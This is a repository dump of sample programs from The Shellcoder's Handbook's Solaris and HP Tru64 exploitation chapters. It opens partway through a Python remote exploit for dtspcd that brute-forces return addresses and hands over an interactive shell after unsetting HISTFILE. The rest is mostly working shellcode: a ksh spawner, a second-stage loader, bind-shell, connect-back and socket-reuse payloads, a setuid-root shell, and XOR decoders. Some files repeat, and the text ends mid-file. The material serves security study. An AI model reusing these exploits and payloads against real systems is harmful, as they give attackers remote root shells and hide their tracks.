... [*]" 214 | 215 | #do some parsing later ;p 216 | 217 | self.ldso_base = 0xff3b0000 #solaris 7, 8 also 9 218 | 219 | self.thr_jmp_table = [ 0x321b4, 0x361d8, 0x361e0, 0x381e8 ] #from various patch clusters 220 | self.increment = 0x400 221 | 222 | for each in self.thr_jmp_table: 223 | 224 | self.retaddr_base = 0x2c000 #vanilla solaris 8 heap brute start 225 | #almost always work! 226 | 227 | while self.retaddr_base < 0x2f000: #heap brute force end 228 | 229 | print "trying; retloc: 0x%08x, retaddr: 0x%08x" %\ 230 | ((self.ldso_base+each), self.retaddr_base) 231 | self.exploit((each+self.ldso_base), self.retaddr_base) 232 | 233 | self.exploit((each+self.ldso_base), self.retaddr_base+4) 234 | 235 | self.retaddr_base += self.increment 236 | 237 | def check_bd(self): 238 | try: 239 | self.recvbuf = self.sck.recv(100) 240 | if self.recvbuf.find("ksh") != -1: 241 | print "got shellcode response: ", self.recvbuf 242 | self.proxy() 243 | except socket.error: 244 | pass 245 | 246 | return -1 247 | 248 | def proxy(self): 249 | 250 | self.t = telnetlib.Telnet() 251 | self.t.sock = self.sck 252 | self.t.write("unset HISTFILE;uname -a;\n") 253 | self.t.interact() 254 | sys.exit(1) 255 | 256 | 257 | def run(self): 258 | self.attack() 259 | return 260 | 261 | 262 | if __name__ == "__main__": 263 | 264 | if len(sys.argv) < 2: 265 | print "usage: dtspcd_exp.py target_ip" 266 | sys.exit(0) 267 | 268 | 269 | exp = DTSPCDExploit(sys.argv[1]) 270 | #print "user, target, port: ", exp.get_user(), exp.get_target(), 271 | exp.get_port() 272 | exp.run() 273 | -------------------------------------------------------------------------------- /Chapter_11/Shellcoders11-find_sym.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 11: Advanced Solaris Exploitation 10 | Sample Program #5 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | 24 | u_long find_sym(char *, char *); 25 | 26 | u_long 27 | find_sym(char *base, char *buzzt) 28 | { 29 | Elf32_Ehdr *ehdr; 30 | Elf32_Shdr *shdr; 31 | Elf32_Word *dynsym, *dynstr; 32 | Elf32_Sym *sym; 33 | const char *s1, *s2; 34 | register int i = 0; 35 | 36 | ehdr = (Elf32_Ehdr *) base; 37 | 38 | shdr = (Elf32_Shdr *) ((char *)base + (Elf32_Off) ehdr->e_shoff); 39 | 40 | /* look for .dynsym */ 41 | 42 | while( i < ehdr->e_shnum){ 43 | 44 | if(shdr->sh_type == SHT_DYNSYM){ 45 | dynsym = (Elf32_Word *) shdr->sh_addr; 46 | dynstr = (Elf32_Word *) shdr->sh_link; 47 | //offset to the dynamic string table's section header 48 | break; 49 | } 50 | 51 | shdr++, i++; 52 | } 53 | 54 | shdr = (Elf32_Shdr *) (base + ehdr->e_shoff); 55 | /* this section header represents the dynamic string table */ 56 | shdr += (Elf32_Word) dynstr; 57 | dynstr = (Elf32_Addr *) shdr->sh_addr; /*relative location of .dynstr*/ 58 | 59 | dynstr += (Elf32_Word) base / sizeof(Elf32_Word); /* relative to virtual */ 60 | dynsym += (Elf32_Word) base / sizeof(Elf32_Word); /* relative to virtual */ 61 | 62 | sym = (Elf32_Sym *) dynsym; 63 | 64 | while(1) { 65 | 66 | /* first entry is in symbol table is always empty, pass it */ 67 | sym++; /* next entry in symbol table */ 68 | 69 | if(ELF32_ST_TYPE(sym->st_info) != STT_FUNC) 70 | continue; 71 | 72 | s1 = (char *) ((char *) dynstr + sym->st_name); 73 | s2 = buzzt; 74 | 75 | while (*s1 == *s2++) 76 | if (*s1++ == 0) 77 | return sym->st_value; 78 | } 79 | 80 | } 81 | -------------------------------------------------------------------------------- /Chapter_11/Shellcoders11sampleprogram01.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 11: Advanced Solaris Exploitation 10 | Sample Program #1 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | 17 | #include 18 | 19 | /* http://lsd-pl.net */ 20 | char shellcode[]= /* 10*4+8 bytes */ 21 | "\x20\xbf\xff\xff" /* bn,a */ 22 | "\x20\xbf\xff\xff" /* bn,a */ 23 | "\x7f\xff\xff\xff" /* call */ 24 | "\x90\x03\xe0\x20" /* add %o7,32,%o0 */ 25 | "\x92\x02\x20\x10" /* add %o0,16,%o1 */ 26 | "\xc0\x22\x20\x08" /* st %g0,[%o0+8] */ 27 | "\xd0\x22\x20\x10" /* st %o0,[%o0+16] */ 28 | "\xc0\x22\x20\x14" /* st %g0,[%o0+20] */ 29 | "\x82\x10\x20\x0b" /* mov 0x0b,%g1 */ 30 | "\x91\xd0\x20\x08" /* ta 8 */ 31 | "/bin/ksh" 32 | ; 33 | 34 | int 35 | main(int argc, char **argv) 36 | { 37 | long *ptr; 38 | long *addr = (long *) shellcode; 39 | 40 | printf("la la lala laaaaa\n"); 41 | 42 | //ld.so base + thr_jmp_table 43 | //[433] |0x000321b4|0x0000001c|OBJT |LOCL |0 |14 |thr_jmp_table 44 | //0xFF3B0000 + 0x000321b4 45 | 46 | ptr = (long *) 0xff3e21b4; 47 | *ptr++ = (long)((long *) shellcode); 48 | 49 | strcmp("mocha", "latte"); //this will make us enter the dynamic linker 50 | //since there is no prior call to strcmp() 51 | 52 | } 53 | 54 | 55 | -------------------------------------------------------------------------------- /Chapter_11/Shellcoders11sampleprogram02.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 11: Advanced Solaris Exploitation 10 | Sample Program #2 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | .align 4 17 | .global main 18 | .type main,#function 19 | .proc 04 20 | main: 21 | ! mmap(0, 0x8000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANON|MAP_SHARED, - 22 | 1, 0); 23 | xor %l1, %l1, %o0 ! %o0 = 0 24 | mov 8, %l1 25 | sll %l1, 12, %o1 ! %o1 = 0x8000 26 | mov 7, %o2 ! %o2 = 7 27 | sll %l1, 28, %o3 28 | or %o3, 0x101, %o3 ! %o3 = 257 29 | mov -1, %o4 ! %o4 = -1 30 | xor %l1, %l1, %o5 ! %o5 = 0 31 | mov 115, %g1 ! SYS_mmap 115 32 | ta 8 ! mmap 33 | 34 | xor %l2, %l2, %l1 ! %l1 = 0 35 | add %l1, %o0, %g2 ! addr of new map 36 | 37 | ! store the address of the new memory region in %g2 38 | 39 | ! len = read(sock, map, 0x8000); 40 | ! socket number can be hardcoded, or use getpeername tricks 41 | add %i1, %l1, %o0 ! sock number assumed to be in %i1 42 | add %l1, %g2, %o1 ! address of the new memory region 43 | mov 8, %l1 44 | sll %l1, 12, %o2 ! bytes to read 0x8000 45 | mov 3, %g1 ! SYS_read 3 46 | ta 8 ! trap to system call 47 | 48 | mov -8, %l2 49 | add %g2, 8, %l1 50 | loop: 51 | flush %l1 - 8 ! flush the instruction cache 52 | cmp %l2, %o0 ! %o0 = number of bytes read 53 | ble,a loop ! loop %o0 / 4 times 54 | add %l2, 4, %l2 ! increment the counter 55 | 56 | jump: 57 | !socket number is already in %i1 58 | sub %g2, 8, %g2 59 | jmp %g2 + 8 ! jump to the maped region 60 | xor %l4, %l5, %l1 ! delay slot 61 | ta 3 ! debug trap, should never be reached ... 62 | -------------------------------------------------------------------------------- /Chapter_12/Shellcoders12-bindsocket.txt: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 13: HP Tru64 Unix Exploitation 10 | Sample Program #9 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | #include 17 | .text 18 | .arch generic 19 | .align 4 20 | .globl main 21 | .ent main 22 | main: 23 | .frame $sp, 0, $26 24 | 25 | #xorloop will give us the pc in a0, 26 | #PC should be pointing to the next in-struction. 27 | #196 bytes total size. 28 | 29 | bic sp, 0xf, sp #make sure the stack is 16 byte aligned 30 | addq a0, 156, s1 #address of sockaddr_in. s1 preserved 31 | addq a0, 172, s2 #address of sizeof(sockadd_in) 32 | addq a0, 184, s4 #address of //bin/sh 33 | stq s4, (sp) #store address of //bin/sh 34 | stq zero, 8(sp) 35 | 36 | mov 0x2, a0 #AF_INET 37 | mov 0x1, a1 #SOCK_STREAM 38 | bis zero, zero, a2 #0 39 | addq zero, 0x61, v0 #socket syscall 40 | PAL_callsys 41 | mov v0, s0 #saved register, preserved. store socket number. 42 | 43 | mov s0, a0 #socket number. 44 | mov s1, a1 #address of sockaddr_in 45 | mov 0x10, a2 #sizeof sockaddr_in = 16 46 | addq zero, 0x68, v0 #bind syscall. 47 | PAL_callsys 48 | 49 | mov s0, a0 #socket number. 50 | mov 0x5, a2 #backlog. 51 | addq zero, 0x6a, v0 #listen syscall. 52 | PAL_callsys 53 | 54 | mov s0, a0 #socket number. 55 | bis zero, zero, a1 #(struct sockaddr *)NULL 56 | mov s2, a2 #address of sizeof sockaddr 57 | addq zero, 0x63, v0 #accept syscall. 58 | PAL_callsys 59 | mov v0, s3 #connected socket number. 60 | 61 | mov 0x2, s2 62 | duploop: 63 | mov s3, a0 #connected socket number. 64 | mov s2, a1 #stdin, stdout, stderr 65 | addq zero, 0x5a, v0 #dup2 syscall 66 | PAL_callsys 67 | subq s2, 0x1, s2 #decrement the counter 68 | bge s2, duploop #loop for 2,1,0 (stderr, stdout, stdin) 69 | 70 | mov s4, a0 #address of //bin/sh 71 | mov sp, a1 #address of (address of //bin/sh) 72 | bis zero, zero, a2 #NULL 73 | addq zero, 0x3b, v0 #execve syscall 74 | PAL_callsys 75 | 76 | .long 0x901f0002 77 | .long 0x00000000 78 | .long 0x00000000 79 | .long 0x00000000 80 | .long 0x10 81 | .long 0x00000000 82 | .long 0x00000000 83 | .quad 0x68732f6e69622f2f 84 | .long 0x00000000 85 | .end main 86 | -------------------------------------------------------------------------------- /Chapter_12/Shellcoders12-connectback.txt: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 13: HP Tru64 Unix Exploitation 10 | Sample Program #9 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | #include 17 | #include 18 | .text 19 | .arch generic 20 | .align 4 21 | .globl main 22 | .ent main 23 | main: 24 | .frame $sp, 0, $26 25 | #148 bytes total size. 26 | #xorloop will give us the pc in a0, 27 | #PC should be pointing to the next in-struction. 28 | 29 | bic sp, 0xf, sp #make sure the stack is 16 byte aligned. 30 | addq a0, 0x70, s1 #address of sockaddr_in. s1 preserved 31 | addq a0, 0x88, s4 #address of //bin/sh 32 | stq s4, (sp) #store address of //bin/sh 33 | stq zero, 8(sp) 34 | 35 | mov 0x2, a0 #AF_INET 36 | mov 0x1, a1 #SOCK_STREAM 37 | bis zero, zero, a2 #0 38 | addq zero, 0x61, v0 #socket syscall 39 | PAL_callsys 40 | mov v0, s0 #saved register, preserved. store socket number. 41 | 42 | mov s0, a0 #socket number 43 | mov s1, a1 #addr of sockaddr_in 44 | mov 0x10, a2 #sizeof sockaddr_in equals 16 45 | addq zero, 0x62, v0 #connect syscall 46 | PAL_callsys 47 | 48 | 49 | mov 0x2, s2 50 | duploop: 51 | mov s0, a0 #socket number. 52 | mov s2, a1 #stdin, stdout, stderr. 53 | addq zero, 0x5a, v0 #dup2 syscall. 54 | PAL_callsys 55 | subq s2, 0x1, s2 #decrement the counter. 56 | bge s2, duploop #loop for 2,1,0 (stderr, stdout, stdin). 57 | 58 | mov s4, a0 #address of //bin/sh 59 | mov sp, a1 #address of (address of //bin/sh) 60 | bis zero, zero, a2 #NULL 61 | addq zero, 0x3b, v0 #execve syscall 62 | PAL_callsys 63 | 64 | .long 0x901f0002 #port number 65 | .long 0x0100007f #ip addr 66 | .long 0x00000000 67 | .long 0x00000000 68 | .long 0x10 69 | .long 0x00000000 70 | .quad 0x68732f6e69622f2f 71 | .long 0x00000000 72 | .end main 73 | -------------------------------------------------------------------------------- /Chapter_12/Shellcoders12-findsocket.txt: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 13: HP Tru64 Unix Exploitation 10 | Sample Program #9 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | #include 17 | #include 18 | .text 19 | .arch generic 20 | .align 4 21 | .globl main 22 | .ent main 23 | main: 24 | .frame $sp, 0, $26 25 | #xorloop will give us the pc in a0, 26 | #PC should be pointing to the next in-struction. 27 | 28 | bic sp, 0xf, sp #make sure the stack is 16 byte aligned. 29 | addq a0, 0xa0, s4 #address of //bin/sh 30 | stq s4, (sp) #store address of //bin/sh 31 | stq zero, 8(sp) 32 | mov 0x10, t0 33 | stq t0, 16(sp) #sizeof(struct sockaddr_in) 34 | lda s2, 16(sp) #address of sizeof(struct sockaddr_in) 35 | lda s1, 24(sp) #address of sockaddr_in 36 | bis zero, zero, s0 37 | lda s0, 0xff(zero) #set counter for the getpeername loop. 38 | bis zero, zero, s3 #zero out s3 39 | mov 0x3412, s3 #src port of peer 40 | sll s3, 0x30, s3 41 | srl s3, 0x30, s3 42 | 43 | getpeerloop: 44 | mov s0, a0 #socket number. 45 | mov s1, a1 #address of sockaddr_in 46 | mov s2, a2 #address of sizeof(struct sockaddr_in) 47 | addq zero, 0x8d, v0 #getpeername syscall. 48 | PAL_callsys 49 | bne v0, again 50 | ldl t0, 24(sp) 51 | sll t0, 0x20, t0 52 | srl t0, 0x30, t0 53 | subq t0, s3, t0 54 | beq t0, out #check if we have a matching source port. 55 | again: 56 | subq s0, 0x1, s0 57 | bge s0, getpeerloop 58 | out: 59 | 60 | mov 0x2, s2 61 | duploop: 62 | mov s0, a0 #socket number 63 | mov s2, a1 #stdin, stdout, stderr 64 | addq zero, 0x5a, v0 #dup2 syscall 65 | PAL_callsys 66 | subq s2, 0x1, s2 #decrement the counter. 67 | bge s2, duploop #loop for 2,1,0 (stderr, stdout, stdin) 68 | 69 | mov s4, a0 #address of //bin/sh 70 | mov sp, a1 #address of (address of //bin/sh) 71 | bis zero, zero, a2 #NULL 72 | addq zero, 0x3b, v0 #execve syscall 73 | PAL_callsys 74 | 75 | .long 0x00000000 76 | .quad 0x68732f6e69622f2f 77 | .long 0x00000000 78 | .end main 79 | -------------------------------------------------------------------------------- /Chapter_12/Shellcoders12-rpc-ttdbserverd-exploit.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/devzero2000/shellcoderhandbook/9da300b22f82e3b9f0888de60e6fb2a029a53a0e/Chapter_12/Shellcoders12-rpc-ttdbserverd-exploit.txt -------------------------------------------------------------------------------- /Chapter_12/Shellcoders12sampleprogram01.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/devzero2000/shellcoderhandbook/9da300b22f82e3b9f0888de60e6fb2a029a53a0e/Chapter_12/Shellcoders12sampleprogram01.c -------------------------------------------------------------------------------- /Chapter_12/Shellcoders12sampleprogram01.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/devzero2000/shellcoderhandbook/9da300b22f82e3b9f0888de60e6fb2a029a53a0e/Chapter_12/Shellcoders12sampleprogram01.txt -------------------------------------------------------------------------------- /Chapter_12/Shellcoders12sampleprogram02.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 12: HP Tru64 Unix Exploitation 10 | Sample Program #2 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | 17 | #include 18 | #include 19 | .text 20 | .arch generic 21 | .align 4 22 | .globl main 23 | .ent main 24 | main: 25 | bis zero, zero, a0 #argument to setuid(), uid=0 26 | addq zero, 0x17, v0 #setuid system call number. 27 | PAL_callsys #trap to kernel mode. 28 | -------------------------------------------------------------------------------- /Chapter_12/Shellcoders12sampleprogram02.txt: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 12: HP Tru64 Unix Exploitation 10 | Sample Program #2 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | 17 | #include 18 | #include 19 | .text 20 | .arch generic 21 | .align 4 22 | .globl main 23 | .ent main 24 | main: 25 | bis zero, zero, a0 #argument to setuid(), uid=0 26 | addq zero, 0x17, v0 #setuid system call number. 27 | PAL_callsys #trap to kernel mode. 28 | -------------------------------------------------------------------------------- /Chapter_12/Shellcoders12sampleprogram03.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 13: HP Tru64 Unix Exploitation 10 | Sample Program #3 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | 17 | #include 18 | #include 19 | .text 20 | .arch generic 21 | .align 4 22 | .globl main 23 | .ent main 24 | main: 25 | .frame $sp, 0, $26 26 | 27 | lda a0, -1000(sp) #GetPC code we have just covered. 28 | back: 29 | bis zero, 0x86, a1 #a1 equals to 0x00000086 which is the imb instructio 30 | #imb instruction syncs the instruction cache thus make it 31 | #coherent with main memory. 32 | 33 | #1st run: store imb instruction in sp - 1000 stack. 34 | stl a1, -4(a0) #2nd run: overwrite the following bsr instruction with imb. 35 | addq a0, 48, a2 36 | stl a1, -4(a2) #also overwrite the 0x41414141 with the imb instruction 37 | #thus avoiding i-cache incoherency af-ter the decode process 38 | #since imb instruction also have NULL bytes this is the only #way to avoid NULL bytes in decoder loop. 39 | 40 | bsr a0, back #branch the label back saving pc in a0 register. 41 | #on the second run bsr will be over-written with nop. 42 | #execution will continue with the next instruction. 43 | addq a0, 52, a4 #offset to xored data plus four. 44 | addq zero, 212, a3 #size of xored data in bytes. !!CHANGE HERE!! 45 | addq a0, 264, a5 #offset to xor key; equals to xordata size plus 52. !CHANGE! 46 | addq a0, 48, a0 #a0 should point to the first instruc-tion of the xored data 47 | #real shellcode should be expecting it this way. 48 | 49 | ldl a1, -4(a5) #load the xor key. 50 | xorloop: 51 | ldl a2, -4(a4) #load a single long from the xored data. 52 | xor a2, a1, a2 #xor/decrypt the long. 53 | stl a2, -4(a4) #store the long back into its loca-tion. 54 | subq a3, 4, a3 #decrement counter. 55 | addq a4, 4, a4 #increment xored data pointer, move to next long. 56 | bne a3, xorloop #branch back to xorloop till counter is zero. 57 | .long 0x41414141 #this long will be overwriten with the imb instruction. 58 | #flush I-cache. 59 | 60 | #xored data starts here. Place the real shellcode encoded with 61 | #the following XOR key. !!CHANGE HERE!! 62 | 63 | .long 0x88888888 #XOR key. !!CHANGE HERE if necessary!! 64 | .end main 65 | -------------------------------------------------------------------------------- /Chapter_12/Shellcoders12sampleprogram03.txt: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 13: HP Tru64 Unix Exploitation 10 | Sample Program #3 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | 17 | #include 18 | #include 19 | .text 20 | .arch generic 21 | .align 4 22 | .globl main 23 | .ent main 24 | main: 25 | .frame $sp, 0, $26 26 | 27 | lda a0, -1000(sp) #GetPC code we have just covered. 28 | back: 29 | bis zero, 0x86, a1 #a1 equals to 0x00000086 which is the imb instructio 30 | #imb instruction syncs the instruction cache thus make it 31 | #coherent with main memory. 32 | 33 | #1st run: store imb instruction in sp - 1000 stack. 34 | stl a1, -4(a0) #2nd run: overwrite the following bsr instruction with imb. 35 | addq a0, 48, a2 36 | stl a1, -4(a2) #also overwrite the 0x41414141 with the imb instruction 37 | #thus avoiding i-cache incoherency af-ter the decode process 38 | #since imb instruction also have NULL bytes this is the only #way to avoid NULL bytes in decoder loop. 39 | 40 | bsr a0, back #branch the label back saving pc in a0 register. 41 | #on the second run bsr will be over-written with nop. 42 | #execution will continue with the next instruction. 43 | addq a0, 52, a4 #offset to xored data plus four. 44 | addq zero, 212, a3 #size of xored data in bytes. !!CHANGE HERE!! 45 | addq a0, 264, a5 #offset to xor key; equals to xordata size plus 52. !CHANGE! 46 | addq a0, 48, a0 #a0 should point to the first instruc-tion of the xored data 47 | #real shellcode should be expecting it this way. 48 | 49 | ldl a1, -4(a5) #load the xor key. 50 | xorloop: 51 | ldl a2, -4(a4) #load a single long from the xored data. 52 | xor a2, a1, a2 #xor/decrypt the long. 53 | stl a2, -4(a4) #store the long back into its loca-tion. 54 | subq a3, 4, a3 #decrement counter. 55 | addq a4, 4, a4 #increment xored data pointer, move to next long. 56 | bne a3, xorloop #branch back to xorloop till counter is zero. 57 | .long 0x41414141 #this long will be overwriten with the imb instruction. 58 | #flush I-cache. 59 | 60 | #xored data starts here. Place the real shellcode encoded with 61 | #the following XOR key. !!CHANGE HERE!! 62 | 63 | .long 0x88888888 #XOR key. !!CHANGE HERE if necessary!! 64 | .end main 65 | -------------------------------------------------------------------------------- /Chapter_12/Shellcoders12sampleprogram04.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 13: HP Tru64 Unix Exploitation 10 | Sample Program #4 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | 17 | #include 18 | #include 19 | .text 20 | .arch generic 21 | .align 4 22 | .globl main 23 | .ent main 24 | main: 25 | .frame $sp, 0, $26 26 | 27 | lda a0, -1000(sp) #GetPC code we have just covered. 28 | back: 29 | bis zero, 0x86, a1 #a1 equals to 0x00000086 which is the imb instructio 30 | #imb instruction syncs the instruction cache thus make it 31 | #coherent with main memory. 32 | 33 | #1st run: store imb instruction in sp - 1000 stack. 34 | stl a1, -4(a0) #2nd run: overwrite the following bsr instruction with imb. 35 | addq a0, 48, a2 36 | stl a1, -4(a2) #also overwrite the 0x41414141 with the imb instruction 37 | #thus avoiding i-cache incoherency af-ter the decode process 38 | #since imb instruction also have NULL bytes this is the only #way to avoid NULL bytes in decoder loop. 39 | 40 | bsr a0, back #branch the label back saving pc in a0 register. 41 | #on the second run bsr will be over-written with nop. 42 | #execution will continue with the next instruction. 43 | addq a0, 52, a4 #offset to xored data plus four. 44 | addq zero, 212, a3 #size of xored data in bytes. !!CHANGE HERE!! 45 | addq a0, 264, a5 #offset to xor key; equals to xordata size plus 52. !CHANGE! 46 | addq a0, 48, a0 #a0 should point to the first instruc-tion of the xored data 47 | #real shellcode should be expecting it this way. 48 | 49 | ldl a1, -4(a5) #load the xor key. 50 | xorloop: 51 | ldl a2, -4(a4) #load a single long from the xored data. 52 | xor a2, a1, a2 #xor/decrypt the long. 53 | stl a2, -4(a4) #store the long back into its loca-tion. 54 | subq a3, 4, a3 #decrement counter. 55 | addq a4, 4, a4 #increment xored data pointer, move to next long. 56 | bne a3, xorloop #branch back to xorloop till counter is zero. 57 | .long 0x41414141 #this long will be overwriten with the imb instruction. 58 | #flush I-cache. 59 | 60 | #xored data starts here. Place the real shellcode encoded with 61 | #the following XOR key. !!CHANGE HERE!! 62 | 63 | .long 0x88888888 #XOR key. !!CHANGE HERE if necessary!! 64 | .end main 65 | -------------------------------------------------------------------------------- /Chapter_12/Shellcoders12sampleprogram04.txt: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 13: HP Tru64 Unix Exploitation 10 | Sample Program #4 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | 17 | #include 18 | #include 19 | .text 20 | .arch generic 21 | .align 4 22 | .globl main 23 | .ent main 24 | main: 25 | .frame $sp, 0, $26 26 | #always assume that current location is in a0 regis-ter, 27 | #it is the responsibility of the decoder to pass the 28 | #current Program Counter to us. 29 | bic sp, 0xf, sp #make sure tha stack is 16 byte aligned. 30 | addq a0, 0x30, s4 #address of //bin/sh 31 | stq s4, (sp) #store address of //bin/sh 32 | stq zero, 8(sp) #store the NULL terminator. 33 | 34 | bis zero, zero, a0 #uid=0, first argument. 35 | addq zero, 0x17, v0 #setuid syscall. 36 | PAL_callsys #trap to kernel. 37 | 38 | mov s4, a0 #address of //bin/sh 39 | mov sp, a1 #address that points to (address of //bin/sh). 40 | bis zero, zero, a2 #NULL. 41 | addq zero, 0x3b, v0 #execve syscall 42 | PAL_callsys #trap to kernel. 43 | 44 | .quad 0x68732f6e69622f2f #/bin/sh\x00 45 | .long 0x00000000 46 | .end main 47 | -------------------------------------------------------------------------------- /Chapter_12/Shellcoders12sampleprogram05.txt: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 13: HP Tru64 Unix Exploitation 10 | Sample Program #5 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | 17 | unsigned int shellcode[] = 18 | { 19 | 0x47c1f11e, 20 | 0x4206140d, 21 | 0xb5be0000, 22 | 0x43e2f400, 23 | 0xb7fe0008, 24 | 0x47ff0410, 25 | 0x00000083, 26 | 0x47de0411, 27 | 0x45ad0410, 28 | 0x47ff0412, 29 | 0x43e77400, 30 | 0x00000083, 31 | 0x69622f2f, 32 | 0x68732f6e, 33 | 0x00000000 34 | }; 35 | 36 | int 37 | main() 38 | { 39 | int i; 40 | 41 | //printf("sizeof shellcode %d\n", sizeof(shellcode)); 42 | for(i =0 ; i < sizeof(shellcode)/4; i++) 43 | printf(".long\t0x%.8x\n", shellcode[i] ^= 0x88888888); 44 | } 45 | -------------------------------------------------------------------------------- /Chapter_12/Shellcoders12sampleprogram06.txt: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 13: HP Tru64 Unix Exploitation 10 | Sample Program #6 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | 17 | #include 18 | #include 19 | .text 20 | .arch generic 21 | .align 4 22 | .globl main 23 | .ent main 24 | main: 25 | .frame $sp, 0, $26 26 | 27 | lda a0, -1000(sp) #GetPC code we have just covered. 28 | back: 29 | bis zero, 0x86, a1 #a1 equals to 0x00000086 which is the imb instructio 30 | #imb instruction syncs the instruction cache thus make it 31 | #coherent with main memory. 32 | 33 | #1st run: store imb instruction in sp - 1000 stack. 34 | stl a1, 